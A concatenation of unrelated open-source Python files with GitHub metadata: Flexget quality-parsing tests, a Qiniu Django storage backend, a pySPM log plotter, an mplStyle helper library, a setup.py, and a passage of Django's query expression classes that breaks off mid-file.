('Test.File.2160p.bluray', '2160p bluray'),
('Test.File.1080p.cam', '1080p cam'),
('A Movie 2011 TS 576P XviD-DTRG', '576p ts xvid'),
('Test.File.720p.bluray.r5', '720p r5'),
('Test.File.1080p.bluray.rc', '1080p r5'),
# 10bit
('Test.File.480p.10bit', '480p 10bit'),
('Test.File.720p.10bit', '720p 10bit'),
('Test.File.720p.bluray.10bit', '720p bluray 10bit'),
('Test.File.1080p.10bit', '1080p 10bit'),
('Test.File.1080p.bluray.10bit', '1080p bluray 10bit'),
('Test.File.720p.web', '720p webdl'),
('Test.File.720p.webdl', '720p webdl'),
('Test.File.1280x720_web dl', '720p webdl'),
('Test.File.720p.h264.web.dl', '720p webdl h264'),
('Test.File.1080p.webhd.x264', '1080p webdl h264'),
('Test.File.480.hdtv.x265', '480p hdtv h265'),
('Test.File.web', 'webdl'),
('Test.File.web-dl', 'webdl'),
('Test.File.720P', '720p'),
('Test.File.1920x1080', '1080p'),
('Test.File.3840x2160', '2160p'),
('Test.File.1080i', '1080i'),
('Test File blurayrip', 'bluray'),
('Test.File.br-rip', 'bluray'),
('Test.File.720px', '720p'),
('Test.File.720p50', '720p'),
('Test.File.dvd.rip', 'dvdrip'),
('Test.File.dvd.rip.r5', 'r5'),
('Test.File.[576p][00112233].mkv', '576p'),
('Test.TS.FooBar', 'ts'),
('Test.File.360p.avi', '360p'),
('Test.File.[360p].mkv', '360p'),
('Test.File.368.avi', '368p'),
('Test.File.720p.hdtv.avi', '720p hdtv'),
('Test.File.1080p.hdtv.avi', '1080p hdtv'),
('Test.File.720p.preair.avi', '720p preair'),
# ('Test.File.ts.dvdrip.avi', 'ts'), This should no exists. Having Telesync and DVDRip is a non-sense.
('Test.File.HDTS.blah', 'ts'),
# ('Test.File.HDCAM.bluray.lie', 'cam'), This should no exists. Having Cam and Bluray is a non-sense.
# Test qualities as part of words. #1593
('Tsar.File.720p', '720p'),
('Camera.1080p', '1080p'),
# Some audio formats
('Test.File.DTSHDMA', 'dtshd'),
('Test.File.DTSHD.MA', 'dtshd'),
('Test.File.DTS.HDMA', 'dtshd'),
('Test.File.dts.hd.ma', 'dtshd'),
('Test.File.DTS.HD', 'dtshd'),
('Test.File.DTSHD', 'dtshd'),
('Test.File.DTS', 'dts'),
('Test.File.truehd', 'truehd'),
('Test.File.DTSHDMA', 'dtshd')
])
def test_quality_failures(self, parser, test_quality):
quality = parser().parse_movie(test_quality[0]).quality
assert str(quality) == test_quality[1], ('`%s` quality should be `%s` not `%s`' % (
test_quality[0], test_quality[1], quality
))
class TestFilterQuality(object):
_config = """
templates:
global:
parsing:
series: {{parser}}
movie: {{parser}}
mock:
- {title: 'Smoke.1280x720'}
- {title: 'Smoke.HDTV'}
- {title: 'Smoke.cam'}
- {title: 'Smoke.HR'}
accept_all: yes
tasks:
qual:
quality:
- hdtv
- 720p
min:
quality: HR+
max:
quality: "<=cam <HR"
min_max:
quality: HR-720i
"""
@pytest.fixture(scope='class', params=['internal', 'guessit'], ids=['internal', 'guessit'])
def config(self, request):
"""Override and parametrize default config fixture."""
return Template(self._config).render({'parser': request.param})
def test_quality(self, execute_task):
task = execute_task('qual')
entry = task.find_entry('rejected', title='Smoke.cam')
assert entry, 'Smoke.cam should have been rejected'
entry = task.find_entry(title='Smoke.1280x720')
assert entry, 'entry not found?'
assert entry in task.accepted, '720p should be accepted'
assert len(task.rejected) == 2, 'wrong number of entries rejected'
assert len(task.accepted) == 2, 'wrong number of entries accepted'
def test_min(self, execute_task):
task = execute_task('min')
entry = task.find_entry('rejected', title='Smoke.HDTV')
assert entry, 'Smoke.HDTV should have been rejected'
entry = task.find_entry(title='Smoke.1280x720')
assert entry, 'entry not found?'
assert entry in task.accepted, '720p should be accepted'
assert len(task.rejected) == 2, 'wrong number of entries rejected'
assert len(task.accepted) == 2, 'wrong number of entries accepted'
def test_max(self, execute_task):
task = execute_task('max')
entry = task.find_entry('rejected', title='Smoke.1280x720')
assert entry, 'Smoke.1280x720 should have been rejected'
entry = task.find_entry(title='Smoke.cam')
assert entry, 'entry not found?'
assert entry in task.accepted, 'cam should be accepted'
assert len(task.rejected) == 3, 'wrong number of entries rejected'
assert len(task.accepted) == 1, 'wrong number of entries accepted'
def test_min_max(self, execute_task):
task = execute_task('min_max')
entry = task.find_entry('rejected', title='Smoke.1280x720')
assert entry, 'Smoke.1280x720 should have been rejected'
entry = task.find_entry(title='Smoke.HR')
assert entry, 'entry not found?'
assert entry in task.accepted, 'HR should be accepted'
assert len(task.rejected) == 3, 'wrong number of entries rejected'
assert len(task.accepted) == 1, 'wrong number of entries accepted'
|
{
"content_hash": "b3e0469ae5f4201441673e1285bbc28b",
"timestamp": "",
"source": "github",
"line_count": 185,
"max_line_length": 110,
"avg_line_length": 39.432432432432435,
"alnum_prop": 0.5803975325565456,
"repo_name": "sean797/Flexget",
"id": "ff119e201deabb8842d58b89be981584888fc7f1",
"size": "7295",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "flexget/tests/test_qualities.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "56725"
},
{
"name": "HTML",
"bytes": "35670"
},
{
"name": "JavaScript",
"bytes": "455222"
},
{
"name": "Python",
"bytes": "2170588"
}
],
"symlink_target": ""
}
|
from jumeaux.models import JudgementAddOnPayload, JudgementAddOnReference
class JudgementExecutor:
def exec(self, payload: JudgementAddOnPayload, reference: JudgementAddOnReference) -> JudgementAddOnPayload:
raise NotImplementedError()
|
{
"content_hash": "6c473a9c57be17fb6e97306725a5301f",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 112,
"avg_line_length": 41.666666666666664,
"alnum_prop": 0.82,
"repo_name": "tadashi-aikawa/gemini",
"id": "ad4d45bc68c840905d07b620d9132d743cd8e339",
"size": "273",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "jumeaux/addons/judgement/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "84854"
}
],
"symlink_target": ""
}
|
import os
from django.utils.encoding import filepath_to_uri
from django.utils.six.moves.urllib.parse import urljoin
from django.core.files.storage import Storage
from django.core.files.base import ContentFile
from django.conf import settings
from qiniu import Auth, BucketManager, put_data
class QiniuStorage(Storage):
def __init__(self):
self.ak = os.environ.get('QINIU_ACCESS_KEY', getattr(settings, 'QINIU_ACCESS_KEY', None))
self.sk = os.environ.get('QINIU_SECRET_KEY', getattr(settings, 'QINIU_SECRET_KEY', None))
self.bn = os.environ.get('QINIU_BUCKET_NAME', getattr(settings, 'QINIU_BUCKET_NAME', None))
self.base_url = os.environ.get('QINIU_BUCKET_DOMAIN', getattr(settings, 'QINIU_BUCKET_DOMAIN', None))
self.auth = Auth(self.ak, self.sk)
def _open(self, name, mode='wb'):
return ContentFile(name, mode)
def _clean_name(self, name):
return name[2:]
def _save(self, name, content):
name = self._clean_name(name)
if hasattr(content, 'chunks'):
data = ''.join(chunk for chunk in content.chunks())
else:
data = content.read()
token = self.auth.upload_token(self.bn, name)
ret, info = put_data(token, name, data)
return name
def delete(self, name):
bucket = BucketManager(self.auth)
bucket.delete(self.bn, name)
def size(self, name):
name = self._clean_name(name)
bucket = BucketManager(self.auth)
ret, info = bucket.stat(self.bn, name)
return ret and ret['fsize']
def exists(self, name):
name = self._clean_name(name)
bucket = BucketManager(self.auth)
ret, info = bucket.stat(self.bn, name)
return ret and ret['hash']
def url(self, name):
return urljoin(self.base_url, filepath_to_uri(name))
|
{
"content_hash": "87f33e472a5e105e92e995383f009f1b",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 109,
"avg_line_length": 31.559322033898304,
"alnum_prop": 0.6364124597207304,
"repo_name": "isayme/django-blog",
"id": "23a546356119deff4850d50b3dcccc562b6dbd62",
"size": "1862",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blog/qiniu_storage.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "42843"
},
{
"name": "HTML",
"bytes": "17256"
},
{
"name": "JavaScript",
"bytes": "4403"
},
{
"name": "Python",
"bytes": "20180"
},
{
"name": "Shell",
"bytes": "146"
}
],
"symlink_target": ""
}
|
import psutil
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.dates import strpdate2num
import pandas as pd
import sys
from pySPM.tools.fpanel import Fpanel
def plotLog(filename, watch=False, **kargs):
fig, ax = plt.subplots(1,1)
fig.subplots_adjust(hspace=0)
plt.show(block=False)
while True:
with open(filename, 'r') as f:
names = f.readline().rstrip().split('\t')
df = pd.read_csv(filename, skiprows=1, delimiter='\t', parse_dates=[0], na_values="<undefined>", names=names)
#df = df.dropna()
ax2 = df.plot("Time", subplots=True, ax=ax, sharex=True)
dt = df.iloc[-1,0]-df.iloc[0,0]
for a in ax2:
if dt.seconds < 15*60:
a.xaxis.set_major_locator(mpl.dates.MinuteLocator(interval=1))
elif dt.seconds < 3*60*60:
a.xaxis.set_major_locator(mpl.dates.MinuteLocator(interval=5))
else:
a.xaxis.set_major_locator(mpl.dates.MinuteLocator(interval=15))
a.xaxis.set_major_formatter(mpl.dates.DateFormatter('%H:%M'))
a.grid()
plt.minorticks_off()
if watch:
mypause(3)
else:
plt.show()
if not watch:
break
def mypause(interval):
backend = plt.rcParams['backend']
if backend in mpl.rcsetup.interactive_bk:
figManager = mpl._pylab_helpers.Gcf.get_active()
if figManager is not None:
canvas = figManager.canvas
if canvas.figure.stale:
canvas.draw()
canvas.start_event_loop(interval)
return
def main():
if len(sys.argv)>1:
filename = sys.argv[1]
print("Plot file \"{}\"".format(filename))
plotLog(filename, watch=False)
else:
F = Fpanel()
logfile = F.getLogFile()
plotLog(logfile, watch=True)
if __name__ == '__main__':
main()
|
{
"content_hash": "620dd9af729a717445d8a1ac2f8717c2",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 117,
"avg_line_length": 32.39344262295082,
"alnum_prop": 0.5774291497975709,
"repo_name": "scholi/pySPM",
"id": "279abfe465e4e7fe586fdd589088be83a17c4ca4",
"size": "1976",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pySPM/tools/emission_current_plotter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "421288"
}
],
"symlink_target": ""
}
|
from setuptools import setup, find_packages
setup(name="python-weixin",
version="0.0.1",
description="Weixin API client",
license="BSD",
install_requires=["simplejson","requests","six", "chardet"],
author="Zongxiao Cheng",
author_email="cacique1103@gmail.com",
url="https://github.com/zongxiao/python-weixin",
packages = find_packages(),
keywords= "weixin",
zip_safe = True)
|
{
"content_hash": "400e44913d1671a9e5d9620a9dbfd274",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 66,
"avg_line_length": 33.46153846153846,
"alnum_prop": 0.639080459770115,
"repo_name": "kingctan/python-weixin",
"id": "a8641b9df911820f265900cd53f30edb8f527d6a",
"size": "457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "21762"
}
],
"symlink_target": ""
}
|
"""A library of top-level style functions.
"""
__version__ = "$Revision: #1 $"
#===========================================================================
import os
import os.path as path
from .SubStyle import SubStyle
#===========================================================================
__all__ = [
'cleanupFilename',
'mergeDicts',
'resolveDefaults',
'stylePath',
]
#===========================================================================
def cleanupFilename( fname ):
""": Make the filename usable.
= INPUT VARIABLES
- fname Given a filename, clean-it up to make sure we can use it with
the file system.
= RETURN VALUE
- Returns a cleaned up form of the input file name.
"""
fname = fname.replace( ' ', '_' )
fname = fname.replace( '/', '_' )
fname = fname.replace( '\\', '_' )
fname = fname.replace( '!', '_' )
fname = fname.replace( '*', '_' )
fname = fname.replace( '`', '_' )
fname = fname.replace( "'", "_" )
fname = fname.replace( '"', "_" )
fname = fname.replace( '{', '(' )
fname = fname.replace( '}', ')' )
fname = fname.replace( '&', '_and_' )
return fname
#===========================================================================
# For internal use only.
def mergeDicts( d1, d2 ):
""": Recursively merge two dictionary data structures.
This essentially performs a union of nested dictionary data
"""
r = {}
r.update( d1 )
for key in d2:
value = d2[ key ]
if key in d1:
if isinstance( value, SubStyle ):
value = value.kwargs()
if isinstance( value, dict ) and ( key in d1 ):
other = d1[ key ]
if isinstance( other, SubStyle ):
other = other.kwargs()
value = mergeDicts( other, value )
r[ key ] = value
return r
#===========================================================================
# For internal use only.
def resolveDefaults( defaults, subNames = [], **kwargs ):
""": Resolve a new set of defaults.
What this funtion will do is:
1) Make a duplicate of the default dictionary to be modified and
returned.
2) For each keyword-value parameter that is not set to None, that value
will be set in the dictionary to be returned. If the value is itself
a dictionary, then it will be "merged" into the return dictionary.
3) For each of the names specified by subNames that exists in the default
dictionary, its values will be set in the dictionary to be returned.
If the value is itself a dictionary, then it will be "merged" into the
return dictionary. It is important to note that the order of the
names specified in 'subNames' is important as that is the order
in which they are resolved.
4) Returns the return dictionary.
When a dictionary 'A' is "merged" into another dictionary 'B', this is much
like the built-in dictionary 'update' method ( 'B.update( A )' ). The
difference is that any value in 'A' that is set to None is not 'updated'
in 'B' and for any values that are themselves dictionaries, then they will
be "merged".
= INPUT VARIABLES
- defaults The current set of default values to resolve with.
- subNames A list of names of sub-properties to resolve (in the order
to resolve them in).
- kwargs Optional keyword arguments to also resolve.
= RETURN VALUE
- Return a new dictionary of default values.
"""
# First duplicate the given defaults
subDefaults = {}
subDefaults.update( defaults )
# Next add in any keyword arguments
for key in kwargs:
value = kwargs[ key ]
# If the kw value is not set, then ignore
if value is None:
continue
# We have a kw value and nothing has been set yet.
if isinstance( value, SubStyle ):
value = value.kwargs()
if isinstance( value, dict ) and ( key in subDefaults ):
other = subDefaults[ key ]
if isinstance( other, SubStyle ):
other = other.kwargs()
value = mergeDicts( other, value )
# Store the value
subDefaults[ key ] = value
for name in subNames:
if name in defaults:
tmp = defaults[ name ]
if tmp is None:
continue
if isinstance( tmp, SubStyle ):
tmp = tmp.kwargs()
if isinstance( tmp, dict ):
subDefaults = mergeDicts( subDefaults, tmp )
else:
subDefaults[ name ] = tmp
return subDefaults
#===========================================================================
def stylePath( envvar = 'STYLEPATH' ):
""": Get the value of the STYLEPATH environment variable
= INPUT VARIABLE
- envvar The name of the environment variable to use for the style path.
= RETURN VALUE
- Return a list of paths as defined by the STYLEPATH environment variable.
"""
result = []
if envvar.startswith( '$' ):
envvar = envvar[ 1: ]
stylepath = os.getenv( envvar, "" )
stylepath = stylepath.split( ':' )
for directory in stylepath:
if len( directory.strip() ) == 0:
continue
p = path.normpath( path.expanduser( path.expandvars( directory ) ) )
result.append( p )
return result
#===========================================================================
|
{
"content_hash": "3eaf26235e7ef0c5312baa6ea58a0a57",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 79,
"avg_line_length": 29.796703296703296,
"alnum_prop": 0.5484049419140697,
"repo_name": "nasa/mplStyle",
"id": "682938278246a7af352a4330807844b209118da3",
"size": "7225",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mplStyle/types/lib.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "578438"
}
],
"symlink_target": ""
}
|
import copy
import datetime
from django.core.exceptions import EmptyResultSet, FieldError
from django.db.backends import utils as backend_utils
from django.db.models import fields
from django.db.models.query_utils import Q
from django.utils.functional import cached_property
class Combinable:
"""
Provides the ability to combine one or two objects with
some connector. For example F('foo') + F('bar').
"""
# Arithmetic connectors
ADD = '+'
SUB = '-'
MUL = '*'
DIV = '/'
POW = '^'
# The following is a quoted % operator - it is quoted because it can be
# used in strings that also have parameter substitution.
MOD = '%%'
# Bitwise operators - note that these are generated by .bitand()
# and .bitor(), the '&' and '|' are reserved for boolean operator
# usage.
BITAND = '&'
BITOR = '|'
BITLEFTSHIFT = '<<'
BITRIGHTSHIFT = '>>'
def _combine(self, other, connector, reversed, node=None):
if not hasattr(other, 'resolve_expression'):
# everything must be resolvable to an expression
if isinstance(other, datetime.timedelta):
other = DurationValue(other, output_field=fields.DurationField())
else:
other = Value(other)
if reversed:
return CombinedExpression(other, connector, self)
return CombinedExpression(self, connector, other)
#############
# OPERATORS #
#############
def __add__(self, other):
return self._combine(other, self.ADD, False)
def __sub__(self, other):
return self._combine(other, self.SUB, False)
def __mul__(self, other):
return self._combine(other, self.MUL, False)
def __truediv__(self, other):
return self._combine(other, self.DIV, False)
def __mod__(self, other):
return self._combine(other, self.MOD, False)
def __pow__(self, other):
return self._combine(other, self.POW, False)
def __and__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitand(self, other):
return self._combine(other, self.BITAND, False)
def bitleftshift(self, other):
return self._combine(other, self.BITLEFTSHIFT, False)
def bitrightshift(self, other):
return self._combine(other, self.BITRIGHTSHIFT, False)
def __or__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def bitor(self, other):
return self._combine(other, self.BITOR, False)
def __radd__(self, other):
return self._combine(other, self.ADD, True)
def __rsub__(self, other):
return self._combine(other, self.SUB, True)
def __rmul__(self, other):
return self._combine(other, self.MUL, True)
def __rtruediv__(self, other):
return self._combine(other, self.DIV, True)
def __rmod__(self, other):
return self._combine(other, self.MOD, True)
def __rpow__(self, other):
return self._combine(other, self.POW, True)
def __rand__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
def __ror__(self, other):
raise NotImplementedError(
"Use .bitand() and .bitor() for bitwise logical operations."
)
class BaseExpression:
"""
Base class for all query expressions.
"""
# aggregate specific fields
is_summary = False
_output_field = None
def __init__(self, output_field=None):
if output_field is not None:
self._output_field = output_field
def get_db_converters(self, connection):
return [self.convert_value] + self.output_field.get_db_converters(connection)
def get_source_expressions(self):
return []
def set_source_expressions(self, exprs):
assert len(exprs) == 0
def _parse_expressions(self, *expressions):
return [
arg if hasattr(arg, 'resolve_expression') else (
F(arg) if isinstance(arg, str) else Value(arg)
) for arg in expressions
]
def as_sql(self, compiler, connection):
"""
Responsible for returning a (sql, [params]) tuple to be included
in the current query.
Different backends can provide their own implementation, by
providing an `as_{vendor}` method and patching the Expression:
```
def override_as_sql(self, compiler, connection):
# custom logic
return super(Expression, self).as_sql(compiler, connection)
setattr(Expression, 'as_' + connection.vendor, override_as_sql)
```
Arguments:
* compiler: the query compiler responsible for generating the query.
Must have a compile method, returning a (sql, [params]) tuple.
Calling compiler(value) will return a quoted `value`.
* connection: the database connection used for the current query.
Returns: (sql, params)
Where `sql` is a string containing ordered sql parameters to be
replaced with the elements of the list `params`.
"""
raise NotImplementedError("Subclasses must implement as_sql()")
@cached_property
def contains_aggregate(self):
for expr in self.get_source_expressions():
if expr and expr.contains_aggregate:
return True
return False
@cached_property
def contains_column_references(self):
for expr in self.get_source_expressions():
if expr and expr.contains_column_references:
return True
return False
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
"""
Provides the chance to do any preprocessing or validation before being
added to the query.
Arguments:
* query: the backend query implementation
* allow_joins: boolean allowing or denying use of joins
in this query
* reuse: a set of reusable joins for multijoins
* summarize: a terminal aggregate clause
* for_save: whether this expression about to be used in a save or update
Returns: an Expression to be added to the query.
"""
c = self.copy()
c.is_summary = summarize
c.set_source_expressions([
expr.resolve_expression(query, allow_joins, reuse, summarize)
for expr in c.get_source_expressions()
])
return c
def _prepare(self, field):
"""
Hook used by Lookup.get_prep_lookup() to do custom preparation.
"""
return self
@property
def field(self):
return self.output_field
@cached_property
def output_field(self):
"""
Returns the output type of this expressions.
"""
if self._output_field_or_none is None:
raise FieldError("Cannot resolve expression type, unknown output_field")
return self._output_field_or_none
@cached_property
def _output_field_or_none(self):
"""
Returns the output field of this expression, or None if no output type
can be resolved. Note that the 'output_field' property will raise
FieldError if no type can be resolved, but this attribute allows for
None values.
"""
if self._output_field is None:
self._resolve_output_field()
return self._output_field
def _resolve_output_field(self):
"""
Attempts to infer the output type of the expression. If the output
fields of all source fields match then we can simply infer the same
type here. This isn't always correct, but it makes sense most of the
time.
Consider the difference between `2 + 2` and `2 / 3`. Inferring
the type here is a convenience for the common case. The user should
supply their own output_field with more complex computations.
If a source does not have an `_output_field` then we exclude it from
this check. If all sources are `None`, then an error will be thrown
higher up the stack in the `output_field` property.
"""
if self._output_field is None:
sources = self.get_source_fields()
num_sources = len(sources)
if num_sources == 0:
self._output_field = None
else:
for source in sources:
if self._output_field is None:
self._output_field = source
if source is not None and not isinstance(self._output_field, source.__class__):
raise FieldError(
"Expression contains mixed types. You must set output_field")
def convert_value(self, value, expression, connection, context):
"""
Expressions provide their own converters because users have the option
of manually specifying the output_field which may be a different type
from the one the database returns.
"""
field = self.output_field
internal_type = field.get_internal_type()
if value is None:
return value
elif internal_type == 'FloatField':
return float(value)
elif internal_type.endswith('IntegerField'):
return int(value)
elif internal_type == 'DecimalField':
return backend_utils.typecast_decimal(value)
return value
def get_lookup(self, lookup):
return self.output_field.get_lookup(lookup)
def get_transform(self, name):
return self.output_field.get_transform(name)
def relabeled_clone(self, change_map):
clone = self.copy()
clone.set_source_expressions(
[e.relabeled_clone(change_map) for e in self.get_source_expressions()])
return clone
def copy(self):
c = copy.copy(self)
c.copied = True
return c
def get_group_by_cols(self):
if not self.contains_aggregate:
return [self]
cols = []
for source in self.get_source_expressions():
cols.extend(source.get_group_by_cols())
return cols
def get_source_fields(self):
"""
Returns the underlying field types used by this
aggregate.
"""
return [e._output_field_or_none for e in self.get_source_expressions()]
def asc(self, **kwargs):
return OrderBy(self, **kwargs)
def desc(self, **kwargs):
return OrderBy(self, descending=True, **kwargs)
def reverse_ordering(self):
return self
def flatten(self):
"""
Recursively yield this expression and all subexpressions, in
depth-first order.
"""
yield self
for expr in self.get_source_expressions():
if expr:
for inner_expr in expr.flatten():
yield inner_expr
class Expression(BaseExpression, Combinable):
"""
An expression that can be combined with other expressions.
"""
pass
class CombinedExpression(Expression):
def __init__(self, lhs, connector, rhs, output_field=None):
super(CombinedExpression, self).__init__(output_field=output_field)
self.connector = connector
self.lhs = lhs
self.rhs = rhs
def __repr__(self):
return "<{}: {}>".format(self.__class__.__name__, self)
def __str__(self):
return "{} {} {}".format(self.lhs, self.connector, self.rhs)
def get_source_expressions(self):
return [self.lhs, self.rhs]
def set_source_expressions(self, exprs):
self.lhs, self.rhs = exprs
def as_sql(self, compiler, connection):
try:
lhs_output = self.lhs.output_field
except FieldError:
lhs_output = None
try:
rhs_output = self.rhs.output_field
except FieldError:
rhs_output = None
if (not connection.features.has_native_duration_field and
((lhs_output and lhs_output.get_internal_type() == 'DurationField') or
(rhs_output and rhs_output.get_internal_type() == 'DurationField'))):
return DurationExpression(self.lhs, self.connector, self.rhs).as_sql(compiler, connection)
if (lhs_output and rhs_output and self.connector == self.SUB and
lhs_output.get_internal_type() in {'DateField', 'DateTimeField', 'TimeField'} and
lhs_output.get_internal_type() == lhs_output.get_internal_type()):
return TemporalSubtraction(self.lhs, self.rhs).as_sql(compiler, connection)
expressions = []
expression_params = []
sql, params = compiler.compile(self.lhs)
expressions.append(sql)
expression_params.extend(params)
sql, params = compiler.compile(self.rhs)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
c.lhs = c.lhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.rhs = c.rhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
class DurationExpression(CombinedExpression):
def compile(self, side, compiler, connection):
if not isinstance(side, DurationValue):
try:
output = side.output_field
except FieldError:
pass
else:
if output.get_internal_type() == 'DurationField':
sql, params = compiler.compile(side)
return connection.ops.format_for_duration_arithmetic(sql), params
return compiler.compile(side)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
expressions = []
expression_params = []
sql, params = self.compile(self.lhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
sql, params = self.compile(self.rhs, compiler, connection)
expressions.append(sql)
expression_params.extend(params)
# order of precedence
expression_wrapper = '(%s)'
sql = connection.ops.combine_duration_expression(self.connector, expressions)
return expression_wrapper % sql, expression_params
class TemporalSubtraction(CombinedExpression):
def __init__(self, lhs, rhs):
super(TemporalSubtraction, self).__init__(lhs, self.SUB, rhs, output_field=fields.DurationField())
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
lhs = compiler.compile(self.lhs, connection)
rhs = compiler.compile(self.rhs, connection)
return connection.ops.subtract_temporals(self.lhs.output_field.get_internal_type(), lhs, rhs)
class F(Combinable):
"""
An object capable of resolving references to existing query objects.
"""
def __init__(self, name):
"""
Arguments:
* name: the name of the field this expression references
"""
self.name = name
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.name)
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
return query.resolve_ref(self.name, allow_joins, reuse, summarize)
def asc(self, **kwargs):
return OrderBy(self, **kwargs)
def desc(self, **kwargs):
return OrderBy(self, descending=True, **kwargs)
class ResolvedOuterRef(F):
"""
An object that contains a reference to an outer query.
In this case, the reference to the outer query has been resolved because
the inner query has been used as a subquery.
"""
def as_sql(self, *args, **kwargs):
raise ValueError(
'This queryset contains a reference to an outer query and may '
'only be used in a subquery.'
)
def _prepare(self, output_field=None):
return self
class OuterRef(F):
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
if isinstance(self.name, self.__class__):
return self.name
return ResolvedOuterRef(self.name)
def _prepare(self, output_field=None):
return self
class Func(Expression):
"""
An SQL function call.
"""
function = None
template = '%(function)s(%(expressions)s)'
arg_joiner = ', '
arity = None # The number of arguments the function accepts.
def __init__(self, *expressions, **extra):
if self.arity is not None and len(expressions) != self.arity:
raise TypeError(
"'%s' takes exactly %s %s (%s given)" % (
self.__class__.__name__,
self.arity,
"argument" if self.arity == 1 else "arguments",
len(expressions),
)
)
output_field = extra.pop('output_field', None)
super(Func, self).__init__(output_field=output_field)
self.source_expressions = self._parse_expressions(*expressions)
self.extra = extra
def __repr__(self):
args = self.arg_joiner.join(str(arg) for arg in self.source_expressions)
extra = ', '.join(str(key) + '=' + str(val) for key, val in self.extra.items())
if extra:
return "{}({}, {})".format(self.__class__.__name__, args, extra)
return "{}({})".format(self.__class__.__name__, args)
def get_source_expressions(self):
return self.source_expressions
def set_source_expressions(self, exprs):
self.source_expressions = exprs
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = self.copy()
c.is_summary = summarize
for pos, arg in enumerate(c.source_expressions):
c.source_expressions[pos] = arg.resolve_expression(query, allow_joins, reuse, summarize, for_save)
return c
def as_sql(self, compiler, connection, function=None, template=None, arg_joiner=None, **extra_context):
connection.ops.check_expression_support(self)
sql_parts = []
params = []
for arg in self.source_expressions:
arg_sql, arg_params = compiler.compile(arg)
sql_parts.append(arg_sql)
params.extend(arg_params)
data = self.extra.copy()
data.update(**extra_context)
# Use the first supplied value in this order: the parameter to this
# method, a value supplied in __init__()'s **extra (the value in
# `data`), or the value defined on the class.
if function is not None:
data['function'] = function
else:
data.setdefault('function', self.function)
template = template or data.get('template', self.template)
arg_joiner = arg_joiner or data.get('arg_joiner', self.arg_joiner)
data['expressions'] = data['field'] = arg_joiner.join(sql_parts)
return template % data, params
def as_sqlite(self, compiler, connection):
sql, params = self.as_sql(compiler, connection)
try:
if self.output_field.get_internal_type() == 'DecimalField':
sql = 'CAST(%s AS NUMERIC)' % sql
except FieldError:
pass
return sql, params
def copy(self):
copy = super(Func, self).copy()
copy.source_expressions = self.source_expressions[:]
copy.extra = self.extra.copy()
return copy
class Value(Expression):
"""
Represents a wrapped value as a node within an expression
"""
def __init__(self, value, output_field=None):
"""
Arguments:
* value: the value this expression represents. The value will be
added into the sql parameter list and properly quoted.
* output_field: an instance of the model field type that this
expression will return, such as IntegerField() or CharField().
"""
super(Value, self).__init__(output_field=output_field)
self.value = value
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.value)
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
val = self.value
# check _output_field to avoid triggering an exception
if self._output_field is not None:
if self.for_save:
val = self.output_field.get_db_prep_save(val, connection=connection)
else:
val = self.output_field.get_db_prep_value(val, connection=connection)
if hasattr(self._output_field, 'get_placeholder'):
return self._output_field.get_placeholder(val, compiler, connection), [val]
if val is None:
# cx_Oracle does not always convert None to the appropriate
# NULL type (like in case expressions using numbers), so we
# use a literal SQL NULL
return 'NULL', []
return '%s', [val]
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
c = super(Value, self).resolve_expression(query, allow_joins, reuse, summarize, for_save)
c.for_save = for_save
return c
def get_group_by_cols(self):
return []
class DurationValue(Value):
def as_sql(self, compiler, connection):
connection.ops.check_expression_support(self)
if connection.features.has_native_duration_field:
return super(DurationValue, self).as_sql(compiler, connection)
return connection.ops.date_interval_sql(self.value)
class RawSQL(Expression):
def __init__(self, sql, params, output_field=None):
if output_field is None:
output_field = fields.Field()
self.sql, self.params = sql, params
super(RawSQL, self).__init__(output_field=output_field)
def __repr__(self):
return "{}({}, {})".format(self.__class__.__name__, self.sql, self.params)
def as_sql(self, compiler, connection):
return '(%s)' % self.sql, self.params
def get_group_by_cols(self):
return [self]
class Star(Expression):
def __repr__(self):
return "'*'"
def as_sql(self, compiler, connection):
return '*', []
class Random(Expression):
def __init__(self):
super(Random, self).__init__(output_field=fields.FloatField())
def __repr__(self):
return "Random()"
def as_sql(self, compiler, connection):
return connection.ops.random_function_sql(), []
class Col(Expression):
